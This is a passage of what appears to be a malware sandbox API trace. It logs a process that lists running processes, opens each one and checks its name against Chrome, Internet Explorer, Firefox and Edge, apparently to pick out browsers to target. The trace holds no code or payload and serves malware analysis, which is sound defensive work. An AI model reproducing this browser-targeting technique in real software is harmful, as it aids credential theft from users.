	[0211.640] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.640] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3b00
	[0211.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.640] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.641] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.641] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.641] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.642] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.642] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3b04
	[0211.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.642] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.643] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.643] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.643] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.651] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.652] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3b08
	[0211.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.652] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.652] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.653] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.653] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.653] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.654] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x3b0c
	[0211.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.654] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.654] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.655] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.655] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.655] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0211.656] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3b10
	[0211.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.656] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0211.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.656] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.657] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0211.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.657] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.657] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.658] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3b14
	[0211.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.658] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.658] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.659] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.659] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.659] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0211.660] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x3b18
	[0211.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.660] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.660] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.661] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.661] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.661] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0211.662] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x3b1c
	[0211.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.662] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0211.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.663] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.663] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0211.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.663] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.663] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.664] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3b20
	[0211.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.664] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.665] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.665] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.665] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.665] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0211.666] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3b24
	[0211.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.666] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0211.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.667] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.667] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0211.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.667] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.667] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0211.668] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x3b28
	[0211.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.668] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0211.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.669] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.669] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0211.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.669] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.669] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0211.670] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x3b2c
	[0211.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.670] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0211.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.670] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.671] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0211.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.671] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.671] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0211.672] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3b30
	[0211.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.672] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0211.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.672] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.673] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0211.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.673] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.673] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0211.674] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0211.674] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0211.674] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3b34
	[0211.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.675] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0211.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.675] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.676] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0211.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.676] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.677] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0211.677] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x3b38
	[0211.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.678] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0211.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.678] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.678] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0211.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.678] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.679] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0211.679] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x3b3c
	[0211.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.679] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0211.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.680] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.680] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0211.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.680] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.681] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0211.681] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3b40
	[0211.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.681] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0211.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.682] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.682] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0211.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.683] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.683] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0211.683] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3b44
	[0211.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.684] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0211.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.684] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.685] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0211.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.685] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.686] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0211.686] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x3b48
	[0211.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.686] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0211.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.687] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.687] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0211.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.687] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.687] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0211.688] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x3b4c
	[0211.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.688] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0211.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.689] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.689] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0211.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.689] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.690] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0211.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3b50
	[0211.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.691] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0211.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.691] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.691] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0211.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.692] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.692] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0211.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3b54
	[0211.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.694] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0211.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.694] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.694] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0211.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.695] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.695] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0211.695] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x3b58
	[0211.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.696] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0211.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.696] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.696] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0211.696] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.696] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.697] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0211.697] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3b5c
	[0211.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.697] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0211.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.698] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.698] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0211.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.699] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.699] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0211.700] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3b60
	[0211.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
